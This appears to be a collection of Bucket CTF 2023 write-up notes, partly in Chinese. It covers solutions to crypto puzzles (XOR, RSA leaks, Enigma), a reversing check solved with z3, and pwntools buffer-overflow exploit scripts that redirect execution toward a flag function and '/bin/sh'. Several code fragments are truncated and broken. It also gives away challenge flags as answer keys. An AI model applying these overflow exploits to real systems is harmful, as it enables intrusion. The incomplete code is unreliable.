[Bucket CTF 2023]





└─$ nc 6915
You are playing a game of table tennis against Cogsworth64's AI bot.
The bot is only able to serve the ball, because Cogsworth64 disabled .
The bot will send a certain spin (represented by a number 0-8) and location (represented by a number 0-8) at each point. If you can guess the spin and location, you win the point. If you can't, the bot wins the point.
The first player to win 20 points wins the game. Try not to lose.

Your score: 0
Bot's score: 0
What is your guess for location?0
What is your guess for spin?0
You lose the point!
The bot's spin was 5 and location was 2
Your score: 0
Bot's score: 1
What is your guess for location?0
What is your guess for spin?0
You lose the point!
The bot's spin was 2 and location was 2
Your score: 0
Bot's score: 2
What is your guess for location?0
What is your guess for spin?0
You lose the point!
The bot's spin was 2 and location was 2
Your score: 0
Bot's score: 3
What is your guess for location?0
What is your guess for spin?0
You lose the point!
The bot's spin was 2 and location was 2
Your score: 0
Bot's score: 4
What is your guess for location?2
What is your guess for spin?2
You win the point!
Your score: 1
Bot's score: 4
What is your guess for location?2
What is your guess for spin?2
You win the point!
Your score: 2
Bot's score: 4
What is your guess for location?2
What is your guess for spin?2
You win the point!
Your score: 3
Bot's score: 4
What is your guess for location?2
What is your guess for spin?2
You win the point!
Your score: 4
Bot's score: 4
What is your guess for location?2
What is your guess for spin?2
You win the point!
You win the game!

rotund bits 未完成


b'\xb3\xd7\x1b\x6b\x2c\xbc\x07 \xea\xd3\xfc\x5f\xe6\x37\xa0 \xa0\xff\x6c\x53\x37\xd7\xee \x9b\xba\x5b\xa4\x4c\xd7\xd7 \xbc\x9e\x6b\x51\xa4\x4b\xe0 \xf6\xc0\x9b\x3c\xf0\x68\x1d \xa6\xe7\x94\xdf\x63\xd9\xe2 \xf2\xf0\x1a\x66\x6a\xa2\x1f \x9e\x40\x1b\xb4\x5e\x35\xd2 \xd8\x2e\x40\xaa\xb5\xee\x6e \xd4\xf0\x2e\x3a\x1b\x0e\x99 \xb1\x16\xb4\x37\x17\xa4\x48 \xb0\xc1\x9a\xfa\x05\x28\xf4 \xbe\x49\xdd\xdb\x90\xa9\xc9 \xb1\xd4\xdd\x2b\x3a\xd2\x63 \xc3\xe3\x63\x69\x6c\x52 \xfe\xf3\xe1\x57\xdc\x57\xa1 \xc4\x62\x02\xec\xe9\xd5\x22 \xb7\x33\x17\x1b\xf2\x50\x2a \xf1\x9a\x06\x36\x18\xc3 \xeb\xd3\x3f\x9e\xc0\xfe\x17 \xe6\x59\x0c\x4c\xa0\xe2\xa5 \xae\x29\x8f\x8d\x8c\xdf\xea \xb5\xcd\x6e\x48\x3e\xab \xbb\xe5\x06\xd7\x33\xc5 \xba\x3e\xdf\xb9\xc6\xbb\xfb \xc8\xe1\xda\x15\xad\xf2\x91 \xcc\x92\x5d\x1e\x9d\x91 \xdc\xe6\x3e\x0b\x5c\xf5 \xfd\x6c\xd1\x57\x5b\xea\x41 \xa6\xf6\x5e\x56\xe2\x5a\x4f \xdf\x37\xc9\xba\xcd\x2e \xcb\x23\x31\x5b\x1a\xf3 \xaf\x30\x93\xf7\xbb\x17 \x93\x98\xff\xf2\xf4\x4c\xb7'

Psychology Random



seedKey = [] # set of 4 human random numbers between 0 and 255 inclusive
addKey =  humanRandomGenerator(1,10) # human random number between 1 and 10 inclusive
for i in range(4):
    seedKey.append(humanRandomGenerator(0, 255))

with open("flag.txt", "rb") as f:
    flag = f.read()

encryptedFlag = bytearray()
for i in range(len(flag)):
    encryptedFlag.append(flag[i] ^ seedKey[i%4])
    seedKey[i%4] = (seedKey[i%4] + addKey) % 255



由于ASCII字符高位都是0,从密文看每36次就会高会一次循环(一半高位0一半高位1)所以addKey=7(256/36),然后根据循环起点高位1的数量确定大概的范围,肉眼可见基本没有乱的可以确定key的值,很幸运第1个是I,第2个是空格,这种情况大概率是"I am..."

#根据高位变化规律,确定增量7 (256/36) 起点范围
b = [enc[i] for i in range(0,len(enc),4)]
[234, 138, 200, 202, 203, 163, 162, 186, 172, 144, 135, 149, 215, 155, 
105, 105, 103, 59, 113, 79, 30, 94, 91, 44, 37, 60, 35, 12, 27, 79, 4, 13, 
229, 229, 250, 185, 203, 135, 142, 197, 217, 170, 190, 182, 173, 172, 136, 140, 212, 140, 
35, 122, 117, 56, 63, 67, 67, 70, 72, 55, 57, 51, 56, 59, 22, 31, 22, 8, 
244, 237, 246, 243, 241, 136, 198, 223, 149, 163, 188, 130, 167, 236, 147, 171, 174, 173, 
46, 39, 46, 103, 115, 81, 10, 72, 24, 91, 37, 40, 53, 41, 14, 8, 6, 18, 9, 
169, 232, 254, 186, 209, 193, 198, 197, 212, 189, 191, 183, 170, 133, 131, 156, 133, 220, 
112, 109, 102, 120, 76, 9, 14, 71, 72, 42, 63, 35, 43, 57, 70, 77, 17, 12, 
242, 232, 224, 244, 241, 202, 223, 214, 219, 179, 166, 166, 191, 181, 128, 152, 210, 148, 
100, 127, 125, 54, 61, 76, 11, 87, 95, 46, 34, 39, 33, 41, 6, 3, 95, 12, 11, 
170, 232, 240, 242, 214, 202, 223, 214, 211, 229, 164, 189, 174, 193, 200, 157, 218, 153, 37, 98, 112, 111, 64, 88, 67, 89, 78, 33, 40, 55, 47, 20, 71, 78, 16, 92, 242, 254, 240, 252, 250, 201, 203, 213, 222, 163, 189, 162, 186, 183, 149, 137, 211, 150, 117, 41, 99, 114, 62, 76, 12, 65, 26, 36, 104, 61, 49, 50, 12, 4, 28, 28, 233, 169, 174, 181, 249, 192, 196, 220, 209, 219, 181, 190, 244, 251, 150, 201, 149, 150, 144, 108, 99, 52, 111, 65, 72, 81, 81, 83, 17, 39, 38, 40, 17, 6, 0, 23, 15, 211, 229, 247, 252, 201, 198, 218, 192, 210, 166, 165, 190, 177, 171, 144, 133, 130, 130, 35, 105, 126, 121, 63, 8, 89, 81, 89, 98, 33, 112, 63, 126, 54, 76, 29, 90, 232, 231, 225, 255, 254, 132]
for i1 in range(0x80-7*7, 0x80-7*7+10):
    c = [((i1+7*i)^b[i])&0xff for i in range(len(b))]
    print(i1, bytes(c))

根据大概数再通过结果修正,确实是I am 

seedKey = [163,181,61,83] #根据显示结果修正

m = []
for i in range(len(enc)):
    m.append(enc[i] ^ seedKey[i%4])
    seedKey[i%4] = (seedKey[i%4] + addKey) % 255

b'I am very sorry to let you know we are unable to offer you admission to Stanford. This decision in no way diminishes your application, which we know was completed with thoughtfulness and care. We were inspired by the hopes and dreams your application represents. We were humbled by the talent, commitment, bucket{sT1LL_crYPt0gRapHiCAlLy_s3cUR3...}, and heart you bring to your academics, extracurricular activities, work, and family responsibilities. Simply put, we wish we had more space in the first-year class. At every step in our process, from the moment we open an application to its eventual presentation in the admission committee, we bring the highest level of consideration to our decisions. Ultimately, these difficult decisions are made with conviction and clarity, and we do not conduct an appeal process. We recommend visiting our page of frequently asked questions for answers about our admission process. I also want to share an article I wrote several years ago for the Los Angeles Times. In it, I reflect on admission decisions in the context of educational journeys that encompass a lifetime. Thank you for applying to Stanford. We enjoyed learning about you, and we know you will thrive wherever your education takes you. With very best wishes, Richard H. Shaw Dean of Admission and Financial Aid'

engma 未完成


I found an old enigma machine and was messing around with it. I put a secret into it but forgot it. I remember some of the settings and have the output. Model: M3 Reflector: B Rotors: I II III Plugboard: AT BS DE FM IR KN LZ OW PV XY Output: rvvrw dxyfi cctev o

Wrap the solution in bucket{} and remove spaces.

search 0-3


from Crypto.Util.number import getPrime, inverse, bytes_to_long
from string import ascii_letters, digits
from random import choice

m = open("flag.txt", "rb").read()
p = getPrime(128)
q = getPrime(128)
n = p * q
e = 65537
l = (p-1)*(q-1)
d = inverse(e, l)

m = pow(bytes_to_long(m), e, n)

p = "{0:b}".format(p)
for i in range(0,108):
    print(p[i], end="")


c = 13239107902510482241468033185859380635553681091807776989153122088094692164374
n = 70091368740163465220150076054753303343809342873669932172778520609948272787957
pa = 0b111100100011010111101101101111010111110001101001000111001000000100110110000110011010111100111110011111110110
P. = PolynomialRing(Zmod(n))
f = pa*2**20 + x 
v = f.monic().small_roots(X=2^20, beta=0.4)

p = int(v[0])
q = n//p 
d = inverse_mod(e, (p-1)*(q-1))
m = pow(c,d,n)
#m = 10368895352824186465612502311017709829844509137436946597498767623293


from Crypto.Util.number import getPrime, inverse, bytes_to_long
from string import ascii_letters, digits
from random import choice

m = open("flag.txt", "rb").read()
p = getPrime(128)
q = getPrime(128)
n = p * q
e = 65537
l = (p-1)*(q-1)
d = inverse(e, l)

m = pow(bytes_to_long(m), e, n)
leak = (p-2)*(q-2)


c = 20921046497068379266125077526806962898582128837995542884725206089966377378921
n = 48840190338286448297079476326071154759298697427813544346418151575212559759237
leak = 48840190338286448297079476326071154758406784045723310119131706040174602802837
e = 65537

from z3 import *
from gmpy2 import invert 
from Crypto.Util.number import *

p,q = Int('p'),Int('q')
s = Solver()
s.add(p*q == n)
s.add(p+q == (n+4-leak)//2)
v = s.model()

p = 252628846929635323275223893760360594943
q = 193327844115481790367998873758617883259
phi = (p-1)*(q-1)
d = invert(e,phi)
m = pow(c,d,n)


from Crypto.Util.number import getPrime, inverse, bytes_to_long, isPrime
from string import ascii_letters, digits
from random import choice

p = bytes_to_long(open("flag.txt", "rb").read())
m = 0
while not isPrime(p):
    p += 1
    m += 1
q = getPrime(len(bin(p)))
n = p * q
e = 65537
l = (p-1)*(q-1)
d = inverse(e, l)

m = pow(m, e, n)


c = 222994213978863330553922294717307292644132816052441853882119473623484428577112619863162149325375659637202223440222380339302067418973630
n = 334760575723542774705270019437269620423492572977096137042514415148155744817190838223911316211781496693341274968244658582355112978166371
d = 101530981943892148447695991216482418254692187208229548438196118679509954784936455455719628630318436454487703910570562418605156238653073
m = pow(c,d,n)
m = 0xe

from gmpy2 import gcd
import random 

def e_dn(e_d,n):
    while True:
        g= random.randint(2,n-1)
        while True:
            if t%2!=0:
            if x > 1 and gcd(x-1, n) > 1:
                return p,q

p,q = e_dn(e*d,n)



from Crypto.Util.number import getPrime, inverse, bytes_to_long, isPrime
from string import ascii_letters, digits
from random import choice

m = bytes_to_long(open("flag.txt", "rb").read())
p = getPrime(128)
q = getPrime(128)
n = p * p
e = 65537
l = (p-1)*(p-1)
d = inverse(e, l)

m = pow(m, e, n)


c1 = 47797682737892115953484395180518349264285435110589415752726386351563180397052
n1 = 53864074128388087701868621546438818337217026484044077665023474433395091270761
c2 = 23778649669106866245954474032238747691063562599599963306072366934189019821037
n2 = 30185375866517447300635112066453153581171712702736030398246225895796204467721

me = crt([c1,c2],[n1,n2])
#me = 1315219050916415178472726952023611679667569911911680490293416891601335959710605129296605584509235799345693878394241999540884629338622342728012202283121154

p = iroot(n1,2)[0]
q = iroot(n2,2)[0]
d = invert(e, p*(p-1)*q*(q-1))
m = pow(me,d,n1*n2)



Parrot 未完成


偏移 栈地址 长度
8 0x7fffffffebb0 输入值  0x40
19 0x7fffffffec08 libc_start_main_ret
23 0x7fffffffed18
26 0x7fffffffed18



3,libc版本是libc-2.35 有点高啊



starting place


int __cdecl main(int argc, const char **argv, const char **envp)
  char input_buf[12]; // [esp+0h] [ebp-28h] BYREF
  char command[20]; // [esp+Ch] [ebp-1Ch] BYREF
  int *p_argc; // [esp+20h] [ebp-8h]

  p_argc = &argc;
  strcpy(command, "ls");
  puts("Hi! would you like see the current directory?");
  read(0, input_buf, 0x1Cu);
  if ( !strcmp(input_buf, "no\n") )
  puts("Ok \n");
  return 0;

never call


from pwn import *

#p = process('./shell1')
p = remote('', 6795)
context(arch='i386', log_level='debug')

#0xffcdb000 0xffcfc000 rwxp      [stack]
p.sendlineafter(b"Enter your name: ", b'A'*62+ p32(0x12ab+0x56555000)) #"Enter your name: "


shell,shell harder


int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
  puts("Starting program");
void getMessage()
  char string[50]; // [esp+Eh] [ebp-3Ah] BYREF

  printf("Enter your name: ");
  printf("Hello, %s\n", string);
void __cdecl printFlag(char *command)



from pwn import *

#p = process('./shell2')
p = remote('', 7007)
context(arch='i386', log_level='debug')
elf = ELF('./shell2')
elf.address = 0x56555000
libc_base = 0xf7d8a000
bin_sh = libc_base + 0x1b90f5

p.sendlineafter(b"Enter your name: ", b'\x00'.ljust(62, b'\x00')+ flat(elf.sym['printFlag'],ret, bin_sh) ) # 








    i = 0;
    for (byte b3 = 0; b3 < 8; b3++)
      i += arrayOfInt[b3]; 
    if (i == 877)
      b2 = 1; 
    if (arrayOfInt[13] == arrayOfInt[16] && arrayOfInt[13] == arrayOfInt[21])      bool1 = true; 
    if (arrayOfInt[19] == 7 * (arrayOfInt[12] - arrayOfInt[13]) / 2)      bool2 = true; 
    if (arrayOfInt[13] + arrayOfInt[12] == arrayOfInt[16] + arrayOfInt[15])      bool3 = true; 
    if (arrayOfInt[7] + arrayOfInt[8] + arrayOfInt[9] - 51 == 2 * arrayOfInt[9])      bool4 = true; 
    if (arrayOfInt[8] == arrayOfInt[20])      bool5 = true; 
    if (arrayOfInt[10] + arrayOfInt[11] - arrayOfInt[17] - arrayOfInt[18] == arrayOfInt[10] - arrayOfInt[17])bool6 = true; 
    if (arrayOfInt[20] == 51)      bool11 = true; 
    if (arrayOfInt[22] + arrayOfInt[23] == arrayOfInt[22] * 2)      bool7 = true; 
    if (arrayOfInt[9] - arrayOfInt[17] == 40)      bool12 = true; 
    if (arrayOfInt[10] - arrayOfInt[17] - 6 == 0)      bool13 = true; 
    if (arrayOfInt[2] - arrayOfInt[11] == 50)      bool10 = true; 
    if (arrayOfInt[24] - arrayOfInt[12] == 10)      bool14 = true; 
    if (arrayOfInt[13] + arrayOfInt[15] == 2 * arrayOfInt[14])      bool8 = true; 
    if (arrayOfInt[23] == arrayOfInt[22] && 3 * arrayOfInt[23] == arrayOfInt[2])      bool9 = true; 
    String str2 = "";
    for (byte b4 = 0; b4 < arrayOfInt.length; b4++)
      str2 = str2 + (char)arrayOfInt[b4]; 
    if (b2 != 0 && bool1 && bool2 && bool3 && bool4 && bool5 && bool6 && bool7 && bool8 && bool9 && bool11 && bool12 && bool13 && bool10 && bool14)
      return "correct flag: " + str2; 
    return "wrong flag: " + str2;


from z3 import *

s = Solver()
a = [BitVec(f'a_{i}',8) for i in range(25)]

for i in range(25):
head = b'bucket{'
for i,v in enumerate(head):
    s.add(a[i] == v)
s.add(a[24] == ord('}'))    
s.add(a[0]+a[1]+a[2]+a[3]+a[4]+a[5]+a[6]+a[7] == 877)
s.add(a[13] == a[16])
s.add(a[13] == a[21])
s.add(a[19]*2 == 7*(a[12]-a[13]))
s.add(a[13]+a[12] == a[15]+a[16])
s.add(a[7]+a[8]-51 == a[9])
s.add(a[8] == a[20])
s.add(a[11] == a[18])
s.add(a[20] == 51)
s.add(a[22] == a[23])
s.add(a[9]-a[17] == 40)
s.add(a[10]-a[17] == 6)
s.add(a[2]-a[11] == 50)
s.add(a[24]-a[12] == 10)
s.add(a[13]+a[15] == 2*a[14])
s.add(a[23] == a[22])
s.add(a[23]*3 == a[2])
d = s.model()

flag = ''
for i in range(25):
    flag+= chr(d[a[i]].as_long())


flag = list(b'bucket{t3tR1sinsiL1#3i!!}')

剩下不能完全确定 13,16,21,19,14 需要从13这爆破一下(后边都由13推出)

flag = list(b'bucket{t3tR1sinsiL1#3i!!}')
for i in range(0x21,0x7f,2):
    flag[13]= i 
    flag[16]= i
    flag[21]= i 
    flag[19]= (flag[12]-flag[13])*7//2
    if not 0x20<=flag[19]<=0x7f:
    flag[14]= (flag[13]+flag[15])//2
    if not 0x20<=flag[14]<=0x7f:

#bucket{t3tR1s_is_L1F3_!!} ?不对
